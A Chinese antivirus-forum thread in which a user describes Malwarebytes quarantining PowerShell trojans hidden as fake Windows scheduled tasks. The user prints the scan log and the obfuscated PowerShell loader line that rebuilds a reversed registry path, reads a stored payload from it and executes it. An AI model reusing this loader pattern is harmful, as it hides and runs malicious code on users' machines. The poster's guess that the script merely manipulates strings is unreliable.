查看: 1178|回复: 6
收起左侧

[讨论] MB的扫描还是够强的,找出了内存溢出的恶意脚本

[复制链接]
JAYSIR
发表于 7 天前 | 显示全部楼层 |阅读模式
本帖最后由 JAYSIR 于 2023-1-25 17:19 编辑

更新一下,还是打消MB日用的想法,后台占用非常高,进主页一看没有任何扫描任务。
过一会儿又好了,感觉还是当个扫描器吧。

---


不知道是不是前两天下载的WEPE(不小心安装到了系统)有问题(一直是WD),这几天电脑内存总是闲置时被两个ps脚本占用满了内存。观察不到恶意现象,但是又查不到来源。也看不到指令是什么。

今天心血来潮下了MB扫了一下,马上就发现问题了。
MB 不仅扫出了关联启动的几条注册表,连同脚本启动也扫出来了。
  1. 檔案: 21
  2. Trojan.PowerShell.Generic, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\WindowsUpdate\Scheduled Startx786kiR, 已隔離, 5221, 1092540, , , , , EB8DFCD6ED37909C689BD4147D2B723A, C0918D6BDD730807243885256C470B691339853FA471388A49DEEC14D1FDED5F
  3. Trojan.PowerShell.Generic, C:\WINDOWS\SYSTEM32\468E6EE7-EA93-4F25-80F4-62CAA941116B.ps1, 已隔離, 5221, 1092540, 1.0.64948, , ame, , AE2B194FD51DFC313AADA57DCD712021, 82DF4E5A288FC5CEB2D555C549D7AA9B2077FE1A9064F5D2740009B6640570E4
  4. Trojan.PowerShell, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\SyncCenter\psPuocYg, 已隔離, 877, 1113383, , , , , E2CF5A635AE40ADF62A961700C1B7E92, ED4EB2279FB8BD5CFF54DD67CC46F0B281F6FD7D7AB5B02653C058C1829D004B
  5. Trojan.PowerShell, C:\WINDOWS\SYSTEM32\31D9.tmp\31DA.tmp.ps1, 已隔離, 877, 1113383, 1.0.64948, , ame, , 927E2BFDA25C45E6096334648DC5BC01, 93B145F610FA90B45655AE4550A4E1C6EA0C949E21125B88E65705C78FD9C2B3
复制代码

当然误报也挺高的,连同chrome下的几条日志也当成病毒了。

PS脚本为,
  1. icm ($joctWzsrJyY::Create([string]::Join('', ((gp (([regex]::Matches('RhXBFyssnoitacilppAderetsigeR\ERAWTFOS\:MLKH', '.', 'RightToLeft') | ForEach { $_.value }) -join '')).'AiD2J2OmnW' | % { [char]$_ }))))
复制代码


对ps不是很熟,没看懂哪里有问题,好像仅仅是在操作字符串导致内存溢出?
注册表看了没什么问题,程序叫科学任务,也可能是什么合法程序创立的。暂时没观测到其他问题,总之可以归类到恶意脚本吧。

使用习惯还是可以的,一直在用WD,从来就没报过毒
打算这段时间切换到MB看看体验如何。




评分

参与人数 1人气 +1 收起 理由
KevinYu0504 + 1 感谢提供分享

查看全部评分

Jerry.Lin
发表于 7 天前 | 显示全部楼层
报毒名是啥
JAYSIR
 楼主| 发表于 7 天前 | 显示全部楼层

Trojan.PowerShell.Generic

Jerry.Lin
发表于 7 天前 | 显示全部楼层
JAYSIR 发表于 2023-1-24 21:56
Trojan.PowerShell.Generic

神奇,我记得MB是不会扫非PE文件的
15717522768
发表于 7 天前 | 显示全部楼层
MalwareBytes......
流氓软件的噩梦
IamAngry
发表于 7 天前 | 显示全部楼层
Malwarebytes在国内经常会拦截一些国内的网络访问,挺烦的
IamAngry
发表于 7 天前 | 显示全部楼层
Jerry.Lin 发表于 2023-1-25 12:12
神奇,我记得MB是不会扫非PE文件的

他们文档里有写吗,特征不覆盖非PE文件在今天这种环境那还真的挺神秘
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2023-2-1 03:33 , Processed in 0.129452 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表